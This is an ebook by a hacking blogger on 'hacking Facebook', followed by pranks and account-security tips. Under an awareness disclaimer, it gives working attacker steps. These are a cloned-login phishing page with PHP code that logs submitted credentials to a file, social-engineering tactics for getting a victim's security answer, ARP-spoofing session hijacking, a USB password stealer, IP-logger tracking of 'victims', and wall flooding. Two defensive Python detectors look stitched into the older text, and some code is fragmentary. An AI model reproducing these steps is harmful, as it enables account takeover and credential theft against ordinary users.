Shikhil Sharma is an engineering student pursuing a degree in Computer Science. He has a great interest in Cyber Security, Hacking, Penetration Testing, SEO and Vulnerability Assessment and loves to write about them.

He also writes about the above mentioned topics at www.hackingtweaks.com and has also contributed articles on famous sites like www.rafayhackingarticles.net. Shikhil also believes in white hat techniques and has reported vulnerabilities in famous sites like answers.com, army institute of technology, weather.com, iscripts.com etc.

Follow Him on Twitter @shikhilsharma .

Contact Him on Facebook @shikhilsharma

Drop him a mail at [email protected] .


Success of a person is not the work of one but due to the cumulative effort of a number of people. I would like to thank my parents, family and almighty for their constant support. A peaceful and supportive environment was provided to me by the people around.

I would like to thank Ishan Garg for designing the cover page. He can be contacted for further assignment here. Nishit and Joy surely deserve a big thank you for editing this book and being the first readers. I’ll also thank Shubham, Priysha, Shriya, Aanchal, Sankalp, Ayur Mayank, Lalit, Simar, Vinit, Samrath, Ruby, Baljeev, Abhishek and entire Raju and co.

All my friends in the field of cyber security including Abhinav Sharma, Lakshya, Gaurav are also thanked for their constant support. A special mention to Vivek Ramachandran for being a person whom I always look up to.

A big thank you to the entire Hacking Tweaks Family for being a source of constant motivation and all my readers for reading HackingTweaks.com. I promise that I’ll keep providing quality content in future too.

Note: The methods mentioned below are only meant to make the reader aware of how they can be trapped by attackers using malicious techniques, and of a few steps to prevent such attacks. The methods below should not be used by the reader to break into someone’s account. The author would not be responsible if the reader is found doing so.

Hacking Facebook

I see a number of posts from people in facebook groups, pages and all around the web requesting a hacker or a techie to HACK facebook for them. These kinds of requests come from people who know nothing about technology or hacking, and they think that a hacker knows some magical spells which he will recite and the account of the victim will be hacked! This is surely not the truth. Hacking facebook is not as easy as it seems to be.

Tip: There is NO facebook hacking software in which you fill in the username of the person to hack and get his facebook password!

Figure 1.(Source: google.com)

As mentioned above, there is no direct software available to hack facebook, but there are a number of methods by which facebook can be hacked. These methods include phishing, keyloggers, social engineering, session hijacking, USB hacking, RATs etc.

In the following section, I will discuss in detail the methods which attackers use to hack a facebook account. The methods are explained in detail so that you can take better measures to protect your facebook account and increase its security.

Phishing

Phishing is a method of hacking facebook in which an attacker provides the victim with a malicious URL which redirects him to a page that looks just like facebook. Mistaking that page for facebook, the user enters his username and password there, and the entered username and password go directly to the attacker.

Facebook Phishing is carried out by attacker in the following way:

1. Firstly, create an account on a web hosting site where they upload all their malicious files.

2. Go to facebook.com and do a ctrl+s on the login page of facebook to store its html format so that they can make the required changes in it and upload it on the web hosting site.

3. View the source code of the login page and search for

“action="https://www.facebook.com/login.php?login_attempt=1" method="post"

4. Replacing the above line of code with “login.php”. And renaming the file to


5. Now a php file named “login” needs to be created.

6. To create the login.php file type the following code given on next page in your

favorite text editor and name the file as “login.php”


header("Location: http://www.facebook.com/");

$handle = fopen("password.txt", "a");

foreach($_GET as $variable => $value)


fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");


fwrite($handle, "\r\n");




7. Make a new txt file by the name of passwords.txt.

8. Make a folder by the name of facebook and put index.htm, login.php and

password.txt in it.

9. Upload all the contents of the folder to your web hosting site and choose the name

of the URL from webhosting site such that the victim does not suspect it.

10. Now give the URL to the victim and as soon as he enters his username and

password in phishing page, password.txt file will store credentials of the victim.
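
Steps 3 and 4 above are what give a cloned page away: its login form no longer posts to facebook.com. The following check is an added example for defenders, not part of the original book. It flags any password form whose action resolves to a host outside an assumed trusted list or is sent without HTTPS. The host list, the sample pages and the login-example.invalid domain are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hosts a genuine login form is expected to post to (assumption for this example).
TRUSTED_HOSTS = {"facebook.com", "www.facebook.com", "m.facebook.com"}

# Constructed sample pages: the genuine form action quoted in step 3, and a clone
# whose action was rewritten to a relative "login.php" as in step 4.
GENUINE_HTML = """<form action="https://www.facebook.com/login.php?login_attempt=1" method="post">
<input type="text" name="email"><input type="password" name="pass"></form>"""
CLONE_HTML = """<form action="login.php" method="post">
<input type="text" name="email"><input type="password" name="pass"></form>"""


class LoginFormAuditor(HTMLParser):
    """Collect the action attribute of every <form> that contains a password field."""

    def __init__(self):
        super().__init__()
        self._in_form = False
        self._has_password = False
        self._current_action = ""
        self.password_form_actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._in_form = True
            self._has_password = False
            self._current_action = attrs.get("action") or ""
        elif tag == "input" and self._in_form:
            if (attrs.get("type") or "").lower() == "password":
                self._has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self._in_form:
            if self._has_password:
                self.password_form_actions.append(self._current_action)
            self._in_form = False

    def close(self):
        super().close()
        self.handle_endtag("form")  # flush a form the page never closed


def audit_login_page(page_url, html):
    """Return (resolved_action_url, reason) findings for suspicious password forms."""
    auditor = LoginFormAuditor()
    auditor.feed(html)
    auditor.close()
    findings = []
    for action in auditor.password_form_actions:
        # A relative action such as "login.php" resolves against the page's own URL.
        target = urlparse(urljoin(page_url, action))
        host = (target.hostname or "").lower()
        if target.scheme != "https":
            findings.append((target.geturl(), "credentials not sent over HTTPS"))
        if host not in TRUSTED_HOSTS:
            findings.append((target.geturl(), "form posts to untrusted host " + host))
    return findings


if __name__ == "__main__":
    print(audit_login_page("https://www.facebook.com/login.php", GENUINE_HTML))
    print(audit_login_page("https://login-example.invalid/facebook/index.htm", CLONE_HTML))
```

The same comparison is what a user does by eye when checking the address bar before typing a password: the page's host, not its appearance, decides where the credentials go.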

FACT: The term “Phishing” was coined by Hackers when they attacked AOL.

Keyloggers

A keylogger is a tool which, when installed on the victim's system, records all the logs of that system. A keylogger is capable of recording keystrokes, screen, webcam logs and almost everything a person is doing on his system. After recording all the logs of the system, the keylogger sends them to the attacker.

Keyloggers are used by hackers to get credentials of a facebook account by installing the keylogger on the victim's machine. But keyloggers are also used by many parents all around the world to monitor the logs of the computer of their children in order to know what their children are up to.

Types of Keylogger:

There are basically two types of keyloggers:

1. Physical Keylogger: It is a keylogger which an attacker installs in the system of the victim when he has physical access to the victim’s computer. The keylogger records all the logs, including the facebook password of the victim, and sends them to the mail of the attacker which he has configured while installing the logger, or the logs are collected physically by the attacker when he accesses the victim’s computer next time.

2. Remote Keylogger: A remote keylogger does the same work as the physical keylogger but it is installed on the victim machine remotely by the attacker. The attacker can crypt the keylogger file with a song or picture and give it to the victim, and as he opens the song or picture the keylogger gets installed on the victim's computer. The logger keeps sending logs to the attacker via mail or ftp.

Tip: You can use http://www.fb.com instead of http://www.facebook.com to load

the facebook page faster.

Social Engineering

Social engineering is a technique in which a hacker tries to get sensitive information out of the victim by using his communication skills. The sensitive information the attacker tries to get can be the username, password, answer to security question etc.

Social engineering evolved only some time ago, and one world famous hacker who amazed everyone with his social engineering techniques was Mr. Kevin Mitnick. Kevin started hacking at an early age of 12, using social engineering on a bus driver to bypass the punchcard system used in the Los Angeles bus system.

How Do Hackers Use Social Engineering to Hack Facebook?

1. Click on 'forgot password' below password field in facebook. You will enter an area

where you will have to help facebook to identify the account of the victim, which

you can easily do by typing his name and a friend’s name or by pasting his profile's

URL in the 'profile link' column.

2. Now in recovery options click on 'answer the security question'. You are given 3

tries, make some relevant guesses, you may get the answer right if you know the

victim well. If you don't then you will have to use Social Engineering to get the

answer from victim.

Some Tips to Make Victim Spell Out What You Want

1. Most of the people on Facebook had set their Security Question long time back,

may be when they had made an account. So most of the people do not change their

question and many of them don't remember the question only. These things will

make your work easy.

2. Don't straight away ask the answer to security question, first talk some random


3. Get to the question slowly and steadily so that victim doesn't suspect you.

Trust me, Social Engineering is one of the Best Methods to Hack any account. All you need is presence of mind and ability to communicate well with people.

Fact: Facebook is majorly written in C++ and PHP.

Trick: Use symbols used in above picture using http://fsymbols.com/ and many more.

Session Hijacking

Session Hijacking refers to an attack in which a hacker temporarily hijacks the ongoing session of the user and is able to see what the user is doing. Facebook is used so much by everyone these days that it is the most exploited website when it comes to session hijacking, as most of the time people are accessing facebook using mobile, computer etc.

Session Hijacking Using Mobile (Android Device)

A tool which performs session hijacking very efficiently in android platform is


Steps of using:

1. Open the app.

2. Check "ARP-Spoofing" and "Genric Mode".

3. Click on Start.

4. In some time you will start getting various facebook sessions on the same network of wifi. Click on them to see what the person is doing.
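
The "ARP-Spoofing" option above works by making other devices on the wifi send their traffic through the attacker's device, and that leaves a trace in each victim's neighbour (ARP) table. The following detection check is an added example, not part of the original book. It parses `ip neigh` output on Linux and reports when the gateway shares a MAC address with another host or differs from a recorded baseline. The addresses and sample tables are constructed.

```python
import re
from collections import defaultdict

# Matches resolved lines of `ip neigh` output, for example:
#   192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)

# Constructed sample tables (not captured from a real network).
CLEAN_TABLE = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.23 dev wlan0 lladdr 66:77:88:99:aa:bb STALE
192.168.1.40 dev wlan0  FAILED
"""
POISONED_TABLE = """\
192.168.1.1 dev wlan0 lladdr 66:77:88:99:aa:bb REACHABLE
192.168.1.23 dev wlan0 lladdr 66:77:88:99:aa:bb STALE
"""


def parse_neighbours(text):
    """Return {ip: mac} for resolved entries; FAILED/INCOMPLETE lines carry no lladdr."""
    table = {}
    for line in text.splitlines():
        match = NEIGH_RE.match(line.strip())
        if match:
            table[match.group("ip")] = match.group("mac").lower()
    return table


def spoofing_indicators(text, gateway_ip, known_gateway_mac=None):
    """Return findings that are consistent with ARP spoofing of the gateway."""
    table = parse_neighbours(text)
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    # One MAC answering for both the gateway and another host is the classic sign
    # of a device placing itself between clients and the router.
    for mac, ips in by_mac.items():
        if gateway_ip in ips and len(ips) > 1:
            others = sorted(ip for ip in ips if ip != gateway_ip)
            findings.append(f"gateway {gateway_ip} shares MAC {mac} with {', '.join(others)}")
    # A gateway MAC that differs from a baseline recorded on a trusted day is a second sign.
    gateway_mac = table.get(gateway_ip)
    if known_gateway_mac and gateway_mac and gateway_mac != known_gateway_mac.lower():
        findings.append(
            f"gateway MAC changed: expected {known_gateway_mac.lower()}, saw {gateway_mac}"
        )
    return findings


if __name__ == "__main__":
    for name, table in (("clean", CLEAN_TABLE), ("poisoned", POISONED_TABLE)):
        print(name, spoofing_indicators(table, "192.168.1.1", "00:11:22:33:44:55"))
```

Either finding on a shared wifi network is a reason to stop using logged-in sessions there until the cause is known; sessions carried only over https are not readable by this kind of interception.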

Trick: To post a blank status update, just copy the following code and update it as your

status: "@[0:0: ]" (don't copy the commas).

Hacking by Stealing Password from Stored Cookies

This method of password hacking is used by the hacker when victim has enabled the

“remember password” feature in his facebook account. What attacker does in this case

is that he captures all the cookies stored in the browser of the victim and thus he gets

the stored password too.

How to use Pendrive as Facebook Password Stealer:

1. Some files are needed to use this, which can be downloaded from here.

2. Extract pendrive password stealer.rar.

3. Copy all the contents of the file.

4. Paste the contents in the pendrive you want to use for stealing.

5. Insert the pendrive in the system of the victim.

6. Click on "launch" file.

7. Within seconds your pendrive will have text files containing all the stored

passwords of the victim for any website.

Tip: Make it a habit to delete cookies every alternate day as they contain sensitive

information about the work you do online.

This is a section which contains a number of facebook tricks, tips and pranks which you can play on your friends using facebook. You see fake posts on facebook claiming to change facebook color, give hundreds of likes etc. In this section you will find 100% working ways of doing such things which till now you have only heard of.

How to Actually Change Color of Your Facebook

I've been seeing a number of posts by people in my friend list regarding changing the color of facebook to Red, Yellow, Green and what not. Similarly, many events were also created claiming to change the color of your facebook profile by clicking on a unique link. At one point of time I had around 15 events in the "event list" of my profile and all of them claimed to change the color of my facebook profile on a specific day and time. All these requests were quite irritating.

Truth about these FAKE Facebook Color Changing Links

Facebook Color Change links were nothing but spam. Most of the links were shortened URLs which directed to sites that paid per click, that is, the more times the facebook color change link got clicked, the more the person who had spread it got paid by the URL shortening site!

Some links were of a type where, as soon as a person clicked on them, a similar link got posted on the wall of every person in the friend list of the person who clicked the link. These kinds of links are called clickjacking links. Clickjacking is a malicious technique of tricking a Web user into clicking on something different to what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages (From: Wikipedia).

How to Actually Change Color of Your Facebook?

Changing color of your facebook account is very simple. If you want to change

color of your facebook account, follow these simple steps:

1. Download a plug-in called Greasemonkey/Tampermonkey.

Mozilla user can download it here and Chrome users here.

2. Install the above downloaded plug-in in your browser.

3. Now install a script from here by clicking "Install" button on right side.

5. Once the script is installed open up your facebook account.

6. As your account is open click on "Tools" menu of your browser and then click on

"User Scripts Commands".

7. In further drop down menu from User Scripts Commands select "Customize Facebook Colors".

8. Now you can easily customize facebook colors and see the change!

How to Get Hundred’s of Likes on Facebook

Sometimes I see a person from my friend list update a status and his status gets hundreds of likes within a few minutes, or sometimes a person gets above 500 likes on a silly status. So here’s a trick on how to get hundreds of likes on your facebook status and photos.

1. Go to this site http://www.likelo.com/

2. On going to this site you’ll see something like the screenshot below.

3. You can now simply follow the instructions given on the site to get likes.


Fact: Facebook was launched on February 4, 2004.

Facebook Status/Chat Hacks

You can post various images and emoticons on your facebook chat, which normal users can’t, using the techniques described in the following section.

1. Post funny images like Mr.Bean, Jacky Chan and your own customized images on

facebook chat :

a. Go to http://smileychatcodes.com/ and select there if you want picture

emoticon or text emoticon and get the code then use it in the chat.

2. Add Facebook profiles/images in chat - You can add facebook profiles,

like pages etc. in facebook chat.

All you have to do is type the unique username like this:[[username]]

For example: If I have to post my image in the chat i will type [[shikhil]] and press enter.

You can see the unique username of page or person from the URL/address bar, It is the thing which is inserted after facebook.com. It will be something

like this facebook.com/username (it may be a name or simple an id in numbers)

Update Status with an iPhone even if You Have a Nokia Phone

You feel jealous of your friends posting status from hi-tech gadgets like

iPhone, Android, Mac, Blackberry? So here's a way out by which you can

also post status from any device you want even if all you have is an old


All you have to do is, go to http://www.fake-wallposts.com/ and click on

the image there of which device you want to display on your status.

Become a hero! Post status once from ipad then from iphone then from

blackberry etc.. :D

Update your Friend’s Status without Telling Him

This is a method of hacking in which you will require a lot of social engineering skills. It is an interesting hack and you can get a number of victims in the trap. Follow these steps:

1. Send this link to the victim- https://m.facebook.com/upload.php?_rdr

2. Make sure he logs in.

3. Victim will be given m.facebooksomething type of an e-mail id on which they will

have to mail. Get that id.

4. Mail on that id from your account (gmail, yahoo, etc.) and what you want victim's

status to be, put that as the "subject" of the mail.

Now the status of your choice will be updated in your friends account.

Trick: http://facebook.com/profile.php?=73322363 : This URL which looks as if will take

you to some other facebook page actually opens the profile of the person whoever clicks


How to Trace Anyone on Facebook

Sometimes we find people on facebook who post malicious content or harass someone by their activities. Tracing these kinds of people becomes important. People sometimes need to be traced to confirm their identity too, as someone might be telling us a fake location, so it becomes important to find their true location. The following steps can be followed if you want to trace someone on facebook:

1. Go to http://blasze.com/iplog/ .

2. In the “Enter URL or Tracking Code” add a URL in which victim will be interested and

you are sure he will open that site.

3. Now click on “create URL”.

4. A new link will be generated which you will have to give to the victim and you will

also be given a code too.

5. After the victim has clicked it put the link again on the site and click “Track URL”.

Then give the code to get the IP of the victim.

How to Update Status as a Celebrity or Anyone You Want

Do you want to create funny wall posts like the one above? You can do that simply in no time! Now I am going to tell you how to create a fully customizable wall post and play pranks on your friends. Follow these steps:

1. Go to http://thewallmachine.com/ and you will see something like below.

2. Now make sure you connect your facebook account with this site.

3. When connected, upload the photo of celebrity/friend you want to make wall post

as then update the status. You can also customize the date when the status was


Flood Your Friend’s Wall and Inbox

I’ll like to mention that this trick is dedicated to my friend Lalit Ahuja on whom I used this

trick the first time!

This is a very annoying trick which can be used to frustrate people by flooding their wall with hundreds of messages, and the same can be done with their facebook inbox. By using this trick you can post hundreds of messages on a person’s wall within minutes.

So let’s start with the process:

1. You need to download a tool called “Auto Clicker by Shocker”.

2. Open “m.facebook.com” from your browser.

3. Now log into your facebook account from and open the account of the friend on

whom you want to play this prank.

4. Open Auto Clicker.

5. Write anything you want to write on your friend’s wall but don’t click on “post”


6. Before clicking on “post” button click on “click or Press F9” button on Auto Clicker.

7. Now we have successfully flooded the wall of our friend as you can see ;).

Trick: http://laterbro.com/ is a site which allows you to pre-schedule your status update, so you can write a status and specify the time when it should be published.

How to Remove Advertisements, Auto Poke and Customize Your Facebook the Way You


For the tricks discussed in the following section you need to download

Greasemonkey/Tampermonkey for Mozilla or Chrome as per your choice.

What is Greasemonkey?

Greasemonkey or Tampermonkey is a plug-in which allows you to install scripts in your browser which make your browsing experience better.

How to Use It?

Once you have downloaded it you will have to install various scripts too, and you will find its utilities in the “tools” menu of your browser; with some scripts you also get an extra option when you right click.

Remove Advertisements from Facebook: You can remove advertisements from facebook which irritate you and also guide you to links where you surely don’t want to go. To remove the advertisements from facebook, install the script from here, and you will see that once you install the script advertisements will not be displayed on facebook.

Autopoke

Autopoke is a script which will automatically poke the person who pokes you. It can be installed from here.

Customize Your Facebook

This script shows better quality profile pictures, links to download videos, google calendar integration and much more! You can fully customize your facebook experience using this script. Install the script from here.

I see a lot of people complaining that their facebook account was Hacked or Hijacked. I personally think that if you have high security on your account it becomes very difficult for the hacker to exploit it. I've seen pictures of a number of girls in various pages/groups and it is evident that those pictures are illegally taken from the accounts of girls and now are being exploited. These are some things which are overlooked by many people using facebook; if taken seriously, they can increase the security of your account many


Don’t Disclose Your E-mail

One should never disclose his e-mail of facebook and even if you have written your e-mail

in your “bio” you should see to it that you hide it. If you disclose your e-mail then attacker

has great piece of important information about your facebook account and he can hack

the e-mail associated with your facebook and then ultimately hack your facebook


Follow the steps below to hide your e-mail:

1. Go to your profile and click on “about”

2. Now go to “contact information” and click on “edit”.

3. You will see e-mail associated with your account, from there you can control who

can see your e-mail.

Enable Secure Browsing

Secure browsing refers to enabling “https”, which provides better encryption than normal “http” browsing and reduces the chances of your account being hacked. You can enable secure browsing by following these steps:

1. Go to “privacy setting” of your account.

2. Now select the “Security” option from the left side of privacy settings page.

3. Now make sure that you “enable” secure browsing.

Enable Login Notification to Provide 24*7 Security to Your Account

Login Notifications is a way by which you can provide 24*7 security to your account. In login notifications you enable some recognized devices from which you regularly come online. If someone logs in to your account from a device other than those, then you get an e-mail and sms notification with the IP from where the login has been made.

To enable the notifications follow these steps:

1. Go to “security settings” like we did in the last security tip.

2. Now click on edit option in “login notifications”.

3. Make sure you have enabled text and email notification.

4. Click on “Save changes” and now you will get notifications on your phone as soon as someone logs in from an unrecognized device, but initially you will have to provide facebook with recognized devices as you log in after enabling this


Keep a Strong Password

Keeping a strong facebook password is always recommended as it is difficult to guess. You

should also make sure that you don’t spill out your password to someone and fall to a

social engineering attack. Some tips which should be kept in mind while keeping a strong


Password should not be guessable by anyone.

It should contain more than 6-7 characters.

Numbers should be there.

Remember to put special keys like /, >, !, $, ^ etc.

A good password is one which uses a combination of all the above types of

keys mentioned.

Conclusion

This was my attempt to share all tips and tricks from all around the web with you which would make you a “Facebook Pro”. I hope after reading this book you are able to make your entire facebook experience better and you are able to secure your facebook account in a better way.

Do give your feedback about the book, both positive and negative feedbacks are

welcomed. Don’t hesitate in pointing out my mistakes.

Do you think it’s over here? It isn’t! Do check out http://www.hackingtweaks.com for

more hacks, tips and tricks!!

Best Wishes,

Shikhil Sharma

([email protected])

